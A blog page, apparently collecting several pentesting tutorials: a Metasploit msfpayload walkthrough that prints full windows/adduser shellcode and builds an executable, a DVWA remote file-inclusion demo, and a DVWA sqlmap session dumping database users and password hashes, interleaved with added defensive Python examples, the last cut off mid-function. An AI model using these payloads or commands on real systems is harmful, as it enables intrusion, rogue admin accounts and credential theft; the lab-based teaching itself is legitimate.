<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Framework Payloads (228 total)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">==============================</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><br /></span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Name Description</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> ---- -----------</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> aix/ppc/shell_find_port Spawn a shell on an established connection</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/exec Execute an arbitrary command</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/shell/find_tag Use an established connection, Spawn a command shell (staged)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/shell_find_port Spawn a shell on an established connection</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsdi/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsdi/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsdi/x86/shell_find_port Spawn a shell on an established connection</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> bsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> cmd/unix/generic Executes the supplied command</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> cmd/unix/interact Interacts with a shell on an established socket connection</span><br />
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">--snip--</span></div>
<div>
<br /></div>
<br />
After choosing a payload, its options can be listed with the S (summary) or O (options) output type:<br />
<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">./msfpayload windows/adduser S</span><br />
<div>
<div>
<span style="font-size: x-small;"> <span style="font-family: Georgia, 'Times New Roman', serif;">Name: Windows Execute net user /ADD</span></span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Module: payload/windows/adduser</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Version: 13053, 9179</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Platform: Windows</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Arch: x86</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Needs Admin: Yes</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Total size: 287</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Rank: Normal</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Provided by:</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> hdm <hdm@metasploit.com></span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> vlad902 <vlad902@gmail.com></span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> sf <stephen_fewer@harmonysecurity.com></span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Basic options:</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Name Current Setting Required Description</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">---- --------------- -------- -----------</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">EXITFUNC process yes Exit technique: seh, thread, process, none</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">PASS metasploit yes The password for this user</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">USER metasploit yes The username to create</span></div>
<div>
<br /></div>
<div>
Description:</div>
<div>
Create a new user and add them to local administration group</div>
</div>
<div>
<br /></div>
<br />
So, from the above information, we know that this payload has three options, all of them required. We can override their default values on the command line as var=val pairs:<br />
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span><br />
<span style="font-family: 'Courier New', Courier, monospace;">./msfpayload windows/adduser PASS=betterhacker USER=betterhacker O</span><br />
<br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">--snip--</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><br /></span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Basic options:</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Name Current Setting Required Description</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">---- --------------- -------- -----------</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">EXITFUNC process yes Exit technique: seh, thread, process, none</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">PASS betterhacker yes The password for this user</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">USER betterhacker yes The username to create</span><br />
<br />
In this way, every option a payload exposes can be set on the command line. For example, if a payload requires an RHOST IP address, you supply it in the same NAME=value form:<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">./msfpayload windows/meterpreter/bind_tcp RHOST=192.168.1.2</span><br />
<div>
<br /></div>
<div>
The last part of the command is the output format for the shellcode. The following output formats are supported: C, Perl, Ruby, Javascript, Exe, Dll, VBA, Raw</div>
<div>
<br /></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">./msfpayload windows/adduser C</span></div>
<div>
<span style="font-size: x-small;"><br /></span></div>
<div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">/*</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> * windows/adduser - 287 bytes</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> * http://www.metasploit.com</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> * VERBOSE=false, EXITFUNC=process, USER=metasploit, </span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> * PASS=metasploit</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> */</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">unsigned char buf[] = </span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x6d\x65\x74"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44\x44\x20\x26\x26"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44"</span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">"\x44\x00";</span></div>
</div>
<div>
<br />
Now this shellcode can be directly used in an exploit!<br />
<br /></div>
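<div>
Before a blob like this is used or handled, an analyst wants to know what it will do. The Python below is an added example (not from this post and not part of Metasploit): it decodes the hex escapes of a C string literal back into bytes and pulls out the printable runs, which is what the <span style="font-family: 'Courier New', Courier, monospace;">strings</span> tool does. The excerpt embedded in it is the tail of the windows/adduser buffer printed above; the function and variable names are mine.</div>

```python
"""Recover the printable strings embedded in a C-style shellcode buffer.

Added example, not from this post or from Metasploit: decode the hex escapes of
the C literal that msfpayload prints, then extract printable runs the way the
`strings` tool does. This is the cheapest first look at what a blob will do.
"""
import re

# Excerpt (copied for this example) of the windows/adduser C output shown
# above: the tail of buf[]. Paste the full buffer here to analyse all of it.
SHELLCODE_C_EXCERPT = r'''
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
"\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72"
"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x6d\x65\x74"
"\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44\x44\x20\x26\x26"
"\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70"
"\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44"
"\x44\x00";
'''

_HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')
_QUOTED_PIECE = re.compile(r'"((?:\\.|[^"\\])*)"')


def c_literal_to_bytes(text: str) -> bytes:
    """Turn the quoted pieces of a C string literal into raw bytes.

    Adjacent "..." pieces are concatenated (as the C compiler does); hex escapes
    become one byte each, any other character inside the quotes is taken as-is,
    and everything outside the quotes (whitespace, the trailing ';') is ignored.
    """
    out = bytearray()
    for piece in _QUOTED_PIECE.findall(text):
        pos = 0
        while pos < len(piece):
            m = _HEX_ESCAPE.match(piece, pos)
            if m:
                out.append(int(m.group(1), 16))
                pos = m.end()
            else:
                out.append(ord(piece[pos]))
                pos += 1
    return bytes(out)


def printable_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of at least min_len printable ASCII bytes, like `strings -n min_len`."""
    pattern = rb'[\x20-\x7e]{%d,}' % min_len
    return [m.group().decode('ascii') for m in re.finditer(pattern, data)]


def embedded_command(c_text: str) -> str:
    """The longest printable run in the buffer. Real shellcode also yields short
    accidental runs from its decoder stub; the command line is the long one."""
    return max(printable_strings(c_literal_to_bytes(c_text)), key=len)


if __name__ == '__main__':
    blob = c_literal_to_bytes(SHELLCODE_C_EXCERPT)
    print(f"{len(blob)} bytes decoded")
    for s in printable_strings(blob):
        print(repr(s))
```

<div>
Run over the full buffer this also turns up a few short accidental runs from the decoder stub, which is why the helper picks the longest run; the line it recovers is exactly what the payload's description above promised: a net user /ADD followed by a net localgroup Administrators /ADD.</div>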
<div>
We can also create an executable with msfpayload.<br />
<span style="font-family: 'Courier New', Courier, monospace;">./msfpayload windows/adduser USER=betterhacker PASS=betterhacker X > adduser.exe</span><br />
<br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Created by msfpayload (http://www.metasploit.com).</span><br />
<br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Payload: windows/adduser</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"> Length: 293</span><br />
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Options: {"USER"=>"betterhacker", "PASS"=>"betterhacker"}</span><br />
<div>
<br /></div>
</div>
<div>
This creates an executable named 'adduser.exe'.<br />
It won't run yet, because the file doesn't have execute permission. To add it:<br />
<span style="font-family: 'Courier New', Courier, monospace;">chmod +x adduser.exe </span><br />
<br />
Now this little executable is ready to run, and it works!</div>
That is it for <span style="font-family: Georgia, 'Times New Roman', serif;">msfpayload</span>. In the next part we will see <span style="font-family: Georgia, 'Times New Roman', serif;">msfencode </span>and <span style="font-family: Georgia, 'Times New Roman', serif;">msfvenom</span>. </div>Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-4538251661335272060.post-60391928932342140242011-10-27T21:31:00.000+05:302011-10-27T21:31:24.403+05:30File Inclusion attack on DVWA<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
Hey, I am not going to write much about this vulnerability. It's pretty straightforward.<br />
The web developer has given you the ability to include any file from the local system, or even from a remote system, through the page parameter. So you can be creative and include any file you want in order to own the system.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="382" src="http://www.youtube.com/embed/PReZd0MBOwk?rel=0&hd=1" width="600"></iframe>
<br />
After watching the video, try this URL just to get some perspective:<br />
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span><br />
<span style="font-family: 'Courier New', Courier, monospace;">http://localhost/dvwa/vulnerabilities/fi/?page=http://google.com/robots.txt</span><br />
<br />
Now, think as devilish as you can and see what else you can do with this hole ;)<br />
Also, take a look at this exploit already present in the Metasploit framework.<br />
<br />
<a href="http://www.metasploit.com/modules/exploit/unix/webapp/php_include">http://www.metasploit.com/modules/exploit/unix/webapp/php_include</a>
<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="382" src="http://www.youtube.com/embed/uIiDDlHfjkg?hd=1" width="600"></iframe>
<br />
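<div>
What makes the URL above work is that the page hands the <span style="font-family: 'Courier New', Courier, monospace;">page</span> parameter straight to include(). The Python below is an added example, not DVWA's code and not a fix from the DVWA project: it shows the checks a hardened version of such a handler would apply to the parameter (no URL scheme, no path separators, a fixed list of includable files, and a final check that the resolved path stays inside the directory). The page names in ALLOWED_PAGES and the function names are assumptions made for this example.</div>

```python
"""Safe handling of an include-style `page` parameter.

Added example, not DVWA's code: the checks a hardened version of the file
inclusion page would apply before including anything. Page names and function
names are assumptions made for this example.
"""
import os
import tempfile
from typing import Optional
from urllib.parse import urlsplit

# Assumed names of the files this page is allowed to include.
ALLOWED_PAGES = frozenset({"include.php", "file1.php", "file2.php", "file3.php"})


def classify_page(page: str) -> str:
    """Say why a `page` value is rejected, or 'ok' if it may be included.

    Order matters: a remote URL has a scheme, an absolute path starts with '/',
    anything containing a path separator (including '../') is traversal, and
    whatever is left must still be on the allow-list (this is what stops
    'index.php', a NUL-suffixed name, or any other unexpected file).
    """
    if not page:
        return "empty"
    if urlsplit(page).scheme:            # http://..., or a stream wrapper
        return "remote-or-wrapper"
    if os.path.isabs(page):
        return "absolute-path"
    if page in (".", "..") or os.path.basename(page) != page:
        return "traversal"
    if page not in ALLOWED_PAGES:
        return "not-allowed"
    return "ok"


def resolve_page(page: str, pages_dir: str) -> Optional[str]:
    """Absolute path to include, or None. Adds a containment check on the
    resolved path: realpath() follows symlinks, so a symlinked entry pointing
    outside pages_dir is refused even though its name passed classify_page()."""
    if classify_page(page) != "ok":
        return None
    root = os.path.realpath(pages_dir)
    target = os.path.realpath(os.path.join(root, page))
    if os.path.commonpath([root, target]) != root or not os.path.isfile(target):
        return None
    return target


SAMPLE_INPUTS = [                        # constructed test values
    "include.php",
    "http://google.com/robots.txt",      # the URL tried in this post
    "../../../../etc/passwd",
    "/etc/passwd",
    "index.php",
]


def demo() -> dict:
    """Create the allow-listed files (empty) in a temp dir and report which of
    the sample inputs resolve to a file inside it."""
    with tempfile.TemporaryDirectory() as d:
        for name in ALLOWED_PAGES:
            open(os.path.join(d, name), "w").close()
        return {p: resolve_page(p, d) is not None for p in SAMPLE_INPUTS}


if __name__ == "__main__":
    for p in SAMPLE_INPUTS:
        print(f"{p!r:35} -> {classify_page(p)}")
    print(demo())
```

<div>
The allow-list is the real fix; the scheme, separator and containment checks are there so that a mistake in the list (or a stray symlink in the directory) still cannot turn the page into an arbitrary file reader.</div>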
<br /></div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-4538251661335272060.post-17045127123222891752011-10-19T23:14:00.000+05:302011-10-19T23:16:14.327+05:30Owning DVWA SQLi with sqlmap<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Here we go... finally writing this post on SQL injection on DVWA. I was caught up with some really boring office (day job) work and some other things to top that. But that has always been the case with my blogging. It's a sad story.<br />
<div>
</div>
<div>
<br /></div>
<div>
In this post I will explain the exploitation of SQL injection vulnerability present in DVWA. For details on DVWA and how to get it, please visit my previous <a href="http://www.betterhacker.com/2011/09/command-execution-on-dvwa.html">post</a>.</div>
<div>
<br /></div>
<div>
<a href="http://4.bp.blogspot.com/-JxFkmELykdA/Tp2wQMxRc9I/AAAAAAAAB2o/pzh4oXkcZnw/s1600/exploits_of_a_mom.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="195" src="http://4.bp.blogspot.com/-JxFkmELykdA/Tp2wQMxRc9I/AAAAAAAAB2o/pzh4oXkcZnw/s640/exploits_of_a_mom.png" width="640" /></a>
</div>
<div>
<br /></div>
<div style="text-align: left;">
SQLMAP:<br />
<span style="font-family: Times, 'Times New Roman', serif;">sqlmap is an automatic SQL injection and database takeover tool. <span style="background-color: white; color: #222222; line-height: 16px; text-align: -webkit-auto;">It is capable of enumerating entire remote databases and performing active database fingerprinting.</span></span><br />
<span style="font-family: Times, 'Times New Roman', serif;"><span style="background-color: white; color: #222222; line-height: 16px; text-align: -webkit-auto;">Get sqlmap from : </span><a href="http://sqlmap.sourceforge.net/" style="background-color: transparent;">http://sqlmap.sourceforge.net/</a></span><br />
<br />
I am documenting the steps I carried out to pwn DVWA. You are free to experiment with the different options and parameters of sqlmap; it is a great tool.<br />
<br />
<br />
<span style="background-color: transparent;">Looking for SQL injection in the webapp:</span></div>
<div style="text-align: left;">
<span style="background-color: transparent;">A good way to spot potential SQL injection in a webapp is to look at its URLs. If you can change a parameter passed in the URL and that change is reflected in the webapp's output, the parameter is probably being passed to the database at the backend. You then need to verify whether it actually allows you to inject SQL.</span></div>
<div style="text-align: left;">
<span style="background-color: transparent;">URL for the DVWA SQLi page is: </span><br />
http://localhost/dvwa/vulnerabilities/sqli/<br />
<br />
After we enter a value (e.g. 1) in the text box, the result is displayed on the page and the URL becomes:<br />
http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#<br />
<br />
We can see that changing the value of the id parameter in the URL gives different results.<br />
Now, let's check whether this page is vulnerable to SQLi using sqlmap.<br />
<br />
<span style="font-family: 'Trebuchet MS', sans-serif;">./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"</span><br />
<br />
This command can be used to test standalone web pages for SQLi, but in our case we are testing a page behind a login, so unauthenticated requests are redirected to login.php. To avoid this, we can use sqlmap's --cookie flag.<br />
We need to provide the value of the cookie set after logging in to DVWA. The cookie value can be found with tools like Burp Suite, WebScarab etc.<br />
<br />
After finding the cookie value, issue the following command:<br />
<br />
<br />
<span style="font-family: 'Trebuchet MS', sans-serif;">./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --dbs</span><br />
<div>
<br /></div>
<br />
The --dbs flag lists the database names if the SQLi is successful.<br />
<br />
sqlmap returns with goodies :)<br />
<br />
<br />
--snip--<br />
<span style="font-family: 'Courier New', Courier, monospace;">available databases [4]:</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">[*] dvwa</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">[*] information_schema</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">[*] mysql</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">[*] w3af_test</span><br />
<div>
<br /></div>
<div>
We will then try to enumerate tables in one of the databases. </div>
<div>
<div>
<span style="background-color: transparent;"><span style="font-family: 'Trebuchet MS', sans-serif;">./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" -D dvwa --tables</span></span></div>
</div>
<div>
<span style="background-color: transparent;">And we are not disappointed... :)</span></div>
<div>
<span style="background-color: transparent;"><span style="font-family: 'Courier New', Courier, monospace;"><br /></span></span></div>
<div>
<span style="background-color: transparent;"></span><br />
<div>
<span style="background-color: transparent;"><span style="font-family: 'Courier New', Courier, monospace;">Database: dvwa</span></span></div>
<span style="background-color: transparent;">
</span><br />
<div>
<span style="background-color: transparent;"><span style="font-family: 'Courier New', Courier, monospace;">[2 tables]</span></span></div>
<span style="background-color: transparent;">
<div>
<span style="font-family: 'Courier New', Courier, monospace;">+-----------+</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">| guestbook |</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">| users |</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">+-----------+</span></div>
<div>
<br /></div>
<div>
You can continue to enumerate the target with the rich set of functionality provided by sqlmap. I will show you the mettle of sqlmap straight away ;)</div>
<div>
<br /></div>
<div>
We can see who the current database user is:</div>
<div>
<div>
<span style="font-family: 'Trebuchet MS', sans-serif;">./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --current-user</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">current user: 'root@localhost'</span></div>
<div>
<br /></div>
<div>
<span style="background-color: transparent;">or list all database users:</span></div>
<div>
<span style="font-family: 'Trebuchet MS', sans-serif;">./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --users</span></div>
<div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">database management system users [4]:</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[*] 'debian-sys-maint'@'localhost'</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[*] 'root'@'127.0.0.1'</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[*] 'root'@'dojo-desktop'</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[*] 'root'@'localhost'</span></div>
</div>
<div>
<br /></div>
<div>
Now that you have the list of users, you will want their passwords as well. That is why sqlmap provides us with the --passwords flag ;)</div>
<div>
<div>
<br /></div>
<div>
<span style="font-family: 'Trebuchet MS', sans-serif;">./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --users --passwords</span></div>
<div>
<br /></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">database management system users password hashes:</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[*] debian-sys-maint [1]:</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;"> password hash: *3F436344A61D99410B1DD47F05788FD5DD72E483</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[*] root [1]:</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;"> password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC</span></div>
</div>
<div>
<br /></div>
<div>
<span style="background-color: transparent;">Crack these hashes and enjoy ;)</span></div>
<div>
<br /></div>
</div>
<div>
<br /></div>
</span></div>
<div>
<br /></div>
</div>
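<div>
The reason sqlmap succeeds here is that the low-security page splices the <span style="font-family: 'Courier New', Courier, monospace;">id</span> value into the SQL text. As an added example (not DVWA's PHP and not sqlmap), the Python below reproduces that query shape next to the parameterised fix, against a constructed in-memory SQLite table, so you can see one input behave differently against each. Table contents and function names are made up for the demo.</div>

```python
"""String-built query versus parameterised query, side by side.

Added example, not DVWA's PHP and not sqlmap: an in-memory SQLite table with
constructed rows, queried the way the low-security DVWA page does it and the
way it should be done. Names and rows are made up.
"""
import sqlite3

ROWS = [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")]  # constructed


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return con


def lookup_vulnerable(con: sqlite3.Connection, user_id: str) -> list:
    """Same shape as the vulnerable page: the parameter lands inside the SQL
    text, so a quote in the input ends the literal and the rest becomes SQL."""
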